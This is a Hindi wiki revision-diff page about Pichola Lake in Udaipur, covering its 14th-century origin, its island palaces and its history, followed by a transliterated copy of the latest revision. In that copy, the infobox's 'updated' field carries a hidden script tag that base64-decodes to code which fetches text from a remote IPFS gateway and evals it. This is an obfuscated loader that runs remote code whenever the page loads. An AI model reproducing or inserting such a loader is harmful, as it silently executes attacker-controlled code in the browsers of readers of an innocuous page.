Difference between revisions of "पिछोला झील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " जगत " to " जगत् ")
 
(3 intermediate revisions by 2 users not shown)
Line 9: Line 9:
 
|निर्देशांक=[http://maps.google.com/maps?q=24.572,73.679&t=m&z=12&vpsrc=0 उत्तर - 24.572° ; पूर्व - 73.679°]
 
|निर्देशांक=[http://maps.google.com/maps?q=24.572,73.679&t=m&z=12&vpsrc=0 उत्तर - 24.572° ; पूर्व - 73.679°]
 
|अधिकतम लंबाई=4 किमी (लगभग)  
 
|अधिकतम लंबाई=4 किमी (लगभग)  
|अधिकतम गहराई= 8.5 मीटर (लगभग)  
+
|अधिकतम गहराई=8.5 मीटर (लगभग)
 
|अधिकतम चौड़ाई=3 किमी (लगभग)  
 
|अधिकतम चौड़ाई=3 किमी (लगभग)  
 
|सतह की ऊँचाई=
 
|सतह की ऊँचाई=
Line 23: Line 23:
 
|अद्यतन= {{अद्यतन|15:46, 8 जनवरी 2012 (IST)}}
 
|अद्यतन= {{अद्यतन|15:46, 8 जनवरी 2012 (IST)}}
 
}}
 
}}
'''पिछोला झील''' [[राजस्थान]] [[राज्य]] के [[उदयपुर]] शहर की सबसे प्रसिद्ध झील है और यह सबसे सुन्दरतम है।  
+
'''पिछोला''' अथवा '''पिछौला झील''' [[राजस्थान|राजस्थान राज्य]] के [[उदयपुर]] शहर की सबसे प्रसिद्ध [[झील]] है और यह सबसे सुन्दरतम है। इसके बीच में [[जग मंदिर उदयपुर|जग मन्दिर]] और जग निवास महल हैं, जिनका प्रतिबिम्ब झील में पड़ता है।
*इसके बीच में [[जग मंदिर उदयपुर|जग मन्दिर]] और जग निवास महल है जिनका प्रतिबिम्ब झील में पड़ता है।  
+
*इस झील का निर्माण 14वीं शताब्दी के अन्त में राणा लाखा के शासनकाल में एक बंजारे ने कराया था और बाद में [[राणा उदयसिंह|राजा उदयसिंह]] ने इसे ठीक कराया।
*इसका निर्माण 14वीं शताब्दी के अन्त में राणा लाखा के शासनकाल में एक बंजारे ने कराया था और बाद में [[राणा उदयसिंह|राजा उदयसिंह]] ने इसे ठीक कराया।  
+
[[चित्र:Pichola-Lake-4.jpg|thumb|200px|left|पिछोला झील, [[उदयपुर]]]]
 +
[[चित्र:Pichola-Lake.jpg|thumb|200px|left|पिछोला झील, [[उदयपुर]]]]
 
*बादशाह बनने से पहले [[शाहजहाँ]] भी इस झील के महलों में आकर ठहरा था।  
 
*बादशाह बनने से पहले [[शाहजहाँ]] भी इस झील के महलों में आकर ठहरा था।  
*इस झील में स्थित दो टापुओं पर जग मंदिर और जग-निवास दो सुंदर महल बने हैं। अब इन महलों को एक पंच-सितारा होटल (लेक पैलेस होटल) में बदल दिया गया है। जिसे राजस्थान, उदयपुर के भूतपूर्व राणा भगवन्त सिंह चलाते हैं।
+
*इस झील में स्थित दो टापुओं पर 'जग मंदिर' और 'जग निवास' दो सुंदर महल बने हैं। अब इन महलों को एक पंच-सितारा होटल (लेक पैलेस होटल) में बदल दिया गया है, जिसे [[राजस्थान]], [[उदयपुर]] के भूतपूर्व राणा भगवन्त सिंह चलाते हैं।
[[चित्र:Pichola-Lake.jpg|thumb|250px|left|पिछोला झील, [[उदयपुर]]]]
+
*14वीं सदी में इस मीठे पानी की [[झील]] का निर्माण राणा लाखा के समय एक 'पिच्छू' नामक बंजारे ने अपने बैल की स्मृति में करवाया था।
 +
*[[मुग़ल]] शासक शाहजहाँ ने अपने पिता [[जहाँगीर]] से विद्रोह के समय यहीं जग निवास में शरण ली थी। वर्तमान में इसे पर्यटन केन्द्र के रूप में विकसित किया जा रहा है।
 +
*झील के समीप 'गलकी नटणी' का चबूतरा बना हुआ है।
 +
*इस झील के किनारे 'राजमहल/सिटी पैलेस' है।
 +
*सीसाराम व बुझडा नदियां इस झील को जलापूर्ति करती हैं।
 +
*जग मन्दिर महल में ही [[1857]] ई. में राष्ट्रीय आन्दोलन के दौरान महाराणा स्वरूप ने नीमच की छावनी से भागकर आए 40 अंग्रेज़ों को शरण देकर क्रांन्तिकारियों से बचाया था।
 +
*जग निवास महल का निर्माण महाराणा जगत् सिंह ने 1746 ई. में करवाया था।<ref>{{cite web |url=http://rajasthangyan.com/notes_explain.jsp?tid=0&nid=12 |title= राजस्थान की सिंचाई परियोजनाएँ|accessmonthday=10 फ़रवरी |accessyear=2017 |last= |first= |authorlink= |format= |publisher=rajasthangyan.com |language= हिन्दी}}</ref>
 +
*मेवाड़ की राजनगरी उदयपुर के राज प्रसादों की दीवारों से पिछोला झील की टकराती लहरों का आनंद ही अलग है। झील अरावली पर्वत श्रेणियों के बीच निर्मित है।
 +
*पिछोला झील चार कि.मी. लम्बी तथा तीन कि.मी. चौड़ी है। इस पर बड़ा पोल नामक मनोहारी बांध बड़ा आकर्षक है।
 +
*झील के पूर्वी किनारे पर खड़ा हुआ सिटी पैलेस तथा दक्षिणी उद्यान झील के कारण ही शोभनीय है।
 +
*उत्तर की ओर स्नान घाट और झील के पार्श्व में घूमने का स्थल मन को सम्मोहित कर देता है।
 +
*[[राजस्थान]] का सबसे बड़ा राज प्रसाद इस पिछोला झील के किनारे स्थित है।
 +
*सुरम्य घाटियों से घिरी पिछोला झील [[उदयपुर]] का अत्यन्त लुभावना स्थान बन गई है।<ref>{{cite web |url=http://hindi.indiawaterportal.org/node/28218 |title=पिछोला झील |accessmonthday=10 फ़रवरी |accessyear=2017 |last= |first= |authorlink= |format= |publisher=hindi.indiawaterportal.org |language= हिन्दी}}</ref>
 +
 
 
{{Panorama
 
{{Panorama
 
|image =चित्र:Udaipur-Panoramic-View.jpg
 
|image =चित्र:Udaipur-Panoramic-View.jpg
Line 35: Line 49:
 
|caption=[[उदयपुर]] नगर का पिछोला झील से विहंगम दृश्य
 
|caption=[[उदयपुर]] नगर का पिछोला झील से विहंगम दृश्य
 
}}
 
}}
 
 
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध=}}
 
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध=}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान की झीलें}}
 
{{राजस्थान की झीलें}}

Latest revision as of 13:50, 30 June 2017

pichhola jhil
nam pichhola jhil
desh bharat
rajy rajasthan
nagar/zila udayapur
nirdeshaank uttar - 24.572° ; poorv - 73.679°
adhikatam lanbaee 4 kimi (lagabhag)
adhikatam gaharaee 8.5 mitar (lagabhag)
adhikatam chau daee 3 kimi (lagabhag)
googal manachitr googal manachitr
nirmata rana lakha
nirman kal 14vian shatabdi
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

pichhola athava pichhaula jhil rajasthan rajy ke udayapur shahar ki sabase prasiddh jhil hai aur yah sabase sundaratam hai. isake bich mean jag mandir aur jag nivas mahal haian, jinaka pratibimb jhil mean p data hai.

  • is jhil ka nirman 14vian shatabdi ke ant mean rana lakha ke shasanakal mean ek banjare ne karaya tha aur bad mean raja udayasianh ne ise thik karaya.

[[chitr:Pichola-Lake-4.jpg|thumb|200px|left|pichhola jhil, udayapur]] [[chitr:Pichola-Lake.jpg|thumb|200px|left|pichhola jhil, udayapur]]

  • badashah banane se pahale shahajahaan bhi is jhil ke mahaloan mean akar thahara tha.
  • is jhil mean sthit do tapuoan par 'jag mandir' aur 'jag nivas' do suandar mahal bane haian. ab in mahaloan ko ek panch-sitara hotal (lek pailes hotal) mean badal diya gaya hai, jise rajasthan, udayapur ke bhootapoorv rana bhagavant sianh chalate haian.
  • 14vian sadi mean is mithe pani ki jhil ka nirman rana lakha ke samay ek 'pichchhoo' namak banjare ne apane bail ki smriti mean karavaya tha.
  • mugal shasak shahajahaan ne apane pita jahaangir se vidroh ke samay yahian jag nivas mean sharan li thi. vartaman mean ise paryatan kendr ke roop mean vikasit kiya ja raha hai.
  • jhil ke samip 'galaki natani' ka chabootara bana hua hai.
  • is jhil ke kinare 'rajamahal/siti pailes' hai.
  • sisaram v bujhada nadiyaan is jhil ko jalapoorti karati haian.
  • jag mandir mahal mean hi 1857 ee. mean rashtriy andolan ke dauran maharana svaroop ne nimach ki chhavani se bhagakar ae 40 aangrezoan ko sharan dekar kraanntikariyoan se bachaya tha.
  • jag nivas mahal ka nirman maharana jagath sianh ne 1746 ee. mean karavaya tha.[1]
  • meva d ki rajanagari udayapur ke raj prasadoan ki divaroan se pichhola jhil ki takarati laharoan ka anand hi alag hai. jhil aravali parvat shreniyoan ke bich nirmit hai.
  • pichhola jhil char ki.mi. lambi tatha tin ki.mi. chau di hai. is par b da pol namak manohari baandh b da akarshak hai.
  • jhil ke poorvi kinare par kh da hua siti pailes tatha dakshini udyan jhil ke karan hi shobhaniy hai.
  • uttar ki or snan ghat aur jhil ke parshv mean ghoomane ka sthal man ko sammohit kar deta hai.
  • rajasthan ka sabase b da raj prasad is pichhola jhil ke kinare sthit hai.
  • suramy ghatiyoan se ghiri pichhola jhil udayapur ka atyant lubhavana sthan ban gee hai.[2]
[[chitr:Udaipur-Panoramic-View.jpg|x200px|alt=b da imamaba da|udayapur nagar ka pichhola jhil se vihangam drishy]]
udayapur nagar ka pichhola jhil se vihangam drishy
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. rajasthan ki sianchaee pariyojanaean (hindi) rajasthangyan.com. abhigaman tithi: 10 faravari, 2017.
  2. pichhola jhil (hindi) hindi.indiawaterportal.org. abhigaman tithi: 10 faravari, 2017.

sanbandhit lekh